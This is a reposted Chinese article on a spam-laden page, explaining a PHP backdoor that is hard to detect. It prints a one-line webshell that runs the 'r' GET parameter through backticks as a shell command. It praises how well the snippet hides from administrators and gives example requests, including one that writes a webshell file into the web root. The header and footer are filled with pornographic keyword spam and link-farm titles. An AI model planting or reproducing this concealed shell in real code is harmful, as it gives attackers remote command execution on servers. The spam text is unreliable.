天天躁日日躁狠狠躁AV麻豆-天天躁人人躁人人躁狂躁-天天澡夜夜澡人人澡-天天影视香色欲综合网-国产成人女人在线视频观看-国产成人女人视频在线观看

一個(gè)不易被發(fā)現(xiàn)的PHP后門代碼解析

偶然間看到一段,看起來似乎沒有什么問題,確是能致命的后門代碼,這里用到了一個(gè)一般的phper都不怎么關(guān)注的反撇號(hào) ` ,反撇號(hào)包含的字符串,等同于shell_exec函數(shù)。

偽裝性很好,很容易被管理員忽略。

$selfNums = $_GET['r'];if (isset($selfNums)){  echo `$selfNums`;}

剛看到這段代碼我想大家都會(huì)說沒有問題,但是細(xì)心的朋友也會(huì)發(fā)現(xiàn)下面的變量被一個(gè)符號(hào)包起來了,既然是變量為什么要這樣了,

而且又不是單引號(hào),這個(gè)就是關(guān)鍵所在了,這個(gè)符號(hào)是 Esc 下面的一個(gè)鍵(位于感嘆號(hào)!旁邊的),

通過 echo `系統(tǒng)命令`; 可以達(dá)到 system(); 一樣的效果

如果不信的朋友可以測(cè)試

http://127.0.0.1/t.php?r=dir 可以列出目錄

http://127.0.0.1/t.php?r=echo 我是馬兒 >>D:/web/90sec.php

我用 appserv 和虛擬主機(jī)已經(jīng)測(cè)試成功。

php技術(shù)一個(gè)不易被發(fā)現(xiàn)的PHP后門代碼解析,轉(zhuǎn)載需保留來源!

鄭重聲明:本文版權(quán)歸原作者所有,轉(zhuǎn)載文章僅為傳播更多信息之目的,如作者信息標(biāo)記有誤,請(qǐng)第一時(shí)間聯(lián)系我們修改或刪除,多謝。

主站蜘蛛池模板: 激情A片久久久久久久 | 国产 亚洲 中文在线 字幕 | 杨幂视频在线观看1分30秒 | 久久网站视频 | 欧美写真视频一区 | 在线视频 亚洲 | 国产精品免费久久久久影院 | 中文人妻熟妇精品乱又伦 | 国产不卡视频在线观看 | 怡春院欧美一区二区三区免费 | 99精品视频一区在线视频免费观看 | 调教女M屁股撅虐调教 | 久久不射电影网 | 一手揉着乳头一手模仿抽插视频 | 国产婷婷色一区二区三区在线 | 寻找最美乡村教师颁奖晚会 | 乳液全集电影在线观看 | 好爽胸大好深好多水 | 99在线观看免费 | 亚洲视频免费 | 大地影院日本韩国电影免费观看 | 免费人妻无码AV不卡在线 | 99日韩精品 | 麻豆精品一区二正一三区 | 久久高清内射无套 | 伦理片 qvod| 我们日本在线观看免费动漫下载 | 玖玖热视频一区二区人妻 | 解开白丝老师的短裙猛烈进入 | 国产午夜视频在线 | 99国产精品白浆在线观看免费 | 国产3级在线观看 | 久久精麻豆亚洲AV国产品 | 大肚婆孕妇网 | 男女XX00上下抽搐动态图 | 国产亚洲精品成人a在线 | 亚洲男女羞羞无遮挡久久丫 | 午夜日韩久久影院 | 久久人妻少妇嫩草AV無碼 | 成品片a免人看免费 | 最近2019中文字幕免费 |